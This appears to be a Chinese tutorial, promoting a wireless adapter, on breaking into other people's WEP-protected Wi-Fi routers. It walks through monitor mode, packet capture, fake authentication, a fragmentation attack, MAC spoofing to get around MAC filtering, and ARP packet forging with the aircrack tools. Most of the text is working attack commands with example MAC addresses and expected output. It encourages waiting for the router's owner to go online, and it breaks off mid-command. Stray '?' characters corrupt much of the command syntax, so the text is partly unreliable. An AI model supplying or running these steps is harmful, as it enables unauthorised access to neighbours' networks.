完整版-SIM.docVIP

Linux下构包注入攻击破解WEP完整教程 卡王专用版 SIMMAXCN E生活网络装备 ??????????????????????????????????????? 准备工作： 在windows下安装好卡王驱动，点“可用连接”扫描附近的无线路由信息，记下你需要破解的SSID，频道，MAC地址(ESSID) 重启电脑，设置U盘或光盘启动 按delete 进入 BIOS ----Advanced BIOS Features----First Boot Device----USB zip ? ??????????????????????????????????????????Second Boot Device----CDrom 按F10----回车 保存设置并重启进入 LINUX 开始破解. 可使用 ↑↓ 箭头按钮找回曾经输入过的命令。 ? 1 打开一个窗口，就是左下角第二个黑色图标，输入： ifconfig? -a ??查看网卡，命令之间只有一个空格，下同，顺便核对自己网卡的MAC。 ifconfig? -a? wlan0? up ?????加载usb网卡驱动（加载这个命令无系统提示） 2 . 输入 ： airmon-ng? start? wlan0? 6 ?? 激活网卡的Monitor模式 后面的6 是你要破解ap 的工作频道? 根据实际，换成你破解的ap的实际工作频道（下同）。 3 .输入 airodump-ng? --ivs? -w? 123? -c? 6? wlan0 --ivs 只抓ivs包 -w?? 写入文件名 可任意 -c??? 选择波段（频道） 其中，wlan0是你破解用的网卡接口名（下同） 回车后我们见到了airodump-ng 工作窗口，已经开始抓包了！ 注意Data这个最重要的数据。大多数情况他会慢慢增长，如果一直为0则不用破了，说明此路由关了猫拔了网线没有任何数据产生，包括有线，在实战中只发现tp-link 少数型号有这现象,你可另寻时机破解（等他开猫上网） ? 4. 上面窗口不关闭，另开一个窗口，用自己的网卡连接要破解的ap，输入： aireplay-ng? -1? 0? -e? linksys? -a? 001601d18d46? -h? 0014bf7fdb2c? wlan0 -1 数字1 发送伪装连接请求 ?0 数字0 延迟 -e? ESSID?? 如果这个ESSID有空格，例如linksys one 则需使用双引号“linksys one”有的ESSID是中文，解决 ??? 办法：1。不输入-e参数，但成功率降低 2。等合法客户端出现直接使用-3破解模式????????? -a? 被破解路由MAC (替换成你要破解的） -h? 你自己网卡MAC (替换成你自己的） wlan0 你的网卡接口 这时，系统将回显 Sending Authentication Request?? Authentication successful? Sending Association Request???? Association successful :-) 代表伪连接成功 ? 不能成功的原因，具体有如下几种： 1、目标AP做了MAC地址过滤 2、你离目标AP物理距离太远 3、对方使用了WPA加密 4、网卡不支持注入 5. 网卡没有使用和AP一样的工作频道 6、输入的ssid拼写有误，请注意检查 你可以根据命令反馈消息来判断原因来尝试解决问题，比如获得一个合法的MAC并伪造MAC、留意airodump-ng 工作窗口，BSSID对应的 STATTON 就是合法用户MAC，下面是改变自己MAC 命令： ?Macchanger? --mac? wlan0? 00:11:22:33:44:55 ? 5 输入 aireplay-ng? -5? -b? 001601d18d46? -h? 0014bf7fdb2c? wlan0 -5 告诉aireplay-ng 使用fragmentation attack模式 如果 -5 不成功，可尝试使用 -4 ??? -b 被破解路由MAC?? （替换成你要破解的） ??? -h 网卡MAC? （替换成你自己的） 系统将回显? Use this packet ?? 输入y? 回车 得到一个至关重要的xor文件 ???? 6 输入 packetforge-ng? -0? -a? 001601d18d46 ?-h? 0014bf7fdb2c? -k? 255.255.255.255? -l? 255.255.255.255? -y? fragment-0302-161820.xor? -w? myarp -0 告诉packetforge-ng来产生一个arp包 -a